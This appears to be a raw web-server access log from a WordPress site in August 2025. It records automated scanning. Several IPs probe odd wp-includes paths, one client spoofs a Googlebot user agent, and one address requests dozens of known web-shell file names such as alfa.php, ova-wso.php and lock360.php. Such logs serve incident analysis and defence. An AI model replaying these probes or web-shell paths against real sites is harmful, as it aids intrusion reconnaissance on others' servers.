101.99.88.90 - - [12/Aug/2025:06:15:17 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:15:19 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:15:30 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:15:31 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
194.102.104.219 - - [12/Aug/2025:06:20:47 +0300] "GET /wp-includes/js/dist/development/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-includes/js/dist/development/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.88.90 - - [12/Aug/2025:06:26:12 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:29:03 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
149.154.161.220 - - [12/Aug/2025:06:29:40 +0300] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 301 795 "-" "TelegramBot (like TwitterBot)"
40.87.154.63 - - [12/Aug/2025:06:29:21 +0300] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 301 795 "-" "-"
101.99.76.20 - - [12/Aug/2025:06:36:57 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:05 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:11 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:20 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:27 +0300] "GET //wp-includes/Text/Diff/Engine/ex.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/ex.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:35 +0300] "GET //wp-includes/Text/Diff/Engine/radio.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/radio.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:50 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.88.90 - - [12/Aug/2025:06:38:16 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:38:18 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:38:19 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:38:19 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:38:20 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:38:30 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:38:32 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:06:30:10 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
63.141.250.58 - - [12/Aug/2025:06:33:15 +0300] "GET /index.php?params=1 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
101.99.88.90 - - [12/Aug/2025:06:33:57 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:34:11 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.76.20 - - [12/Aug/2025:06:37:14 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:30 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:39 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:41 +0300] "GET //wp-includes/Text/Diff/Engine/inputs.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/inputs.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:43 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:47 +0300] "GET //wp-includes/Text/Diff/Engine/about.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:37:53 +0300] "GET //wp-includes/Text/Diff/Engine/pages.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke//wp-includes/Text/Diff/Engine/pages.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.88.90 - - [12/Aug/2025:06:38:08 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
101.99.88.90 - - [12/Aug/2025:06:38:21 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:40:56 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:41:23 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:58:16 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:49:14 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:49:27 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:06:58:16 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.241.208.231 - - [12/Aug/2025:07:04:47 +0300] "GET /upload.php?mr=exe3 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:49 +0300] "GET /great1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:50 +0300] "GET /wp-configs.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:58 +0300] "GET /wp-content/themes/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:59 +0300] "GET /ty.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:01 +0300] "GET /fw.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:03 +0300] "GET /alfa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:06 +0300] "GET /x.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:07 +0300] "GET /mail.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:09 +0300] "GET /wp-admin/includes/class-wp-debug-data-constructor.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:10 +0300] "GET /wp-includes/IXR/wp-login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:12 +0300] "GET /templates/hcapmaster_comps.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:16 +0300] "GET /wp-admin/network/editor.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:18 +0300] "GET /manager.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:21 +0300] "GET /sidwsi.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:23 +0300] "GET /cjfuns.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:45 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:52 +0300] "GET /system_log.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:53 +0300] "GET /01.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:04:56 +0300] "GET /akp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:04 +0300] "GET /mini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:13 +0300] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:15 +0300] "GET /past.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:20 +0300] "GET /wp-admin/maint/wp-mail.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:26 +0300] "GET /akc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:30 +0300] "GET /av.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:36 +0300] "GET /inputs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:44 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:46 +0300] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:48 +0300] "GET /upload.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:50 +0300] "GET /lock360.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:54 +0300] "GET /.well-known/pki-validation/?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:28 +0300] "GET /wp-content/batm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:32 +0300] "GET /wp-content/batm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:34 +0300] "GET /wp-content/themes/extol/settings.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:38 +0300] "GET /wp-admin/maint/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:40 +0300] "GET /alfa-rex.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:42 +0300] "GET /mah.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:52 +0300] "GET /lock.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:56 +0300] "GET /wp-admin/wp-login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:00 +0300] "GET /ova-wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:04 +0300] "GET /xml.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:12 +0300] "GET /moon.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:15 +0300] "GET /ws.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:16 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:18 +0300] "GET /wp-content/plugins/upgrade.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:29 +0300] "GET /akc.php?kece=akukece@451 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:35 +0300] "GET /.well-known/acme-challenge/radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:05:58 +0300] "GET /pic.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:02 +0300] "GET /av.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:05 +0300] "GET /1.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:07 +0300] "GET /.well-known/pki-validation/index.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:09 +0300] "GET /wp-includes/class-wp-user-wp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:20 +0300] "GET /wp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:22 +0300] "GET /small.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:24 +0300] "GET /file5.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:27 +0300] "GET /uploader.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:31 +0300] "GET /wp-content/403.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:33 +0300] "GET /403.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:37 +0300] "GET /marijuana.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:45 +0300] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
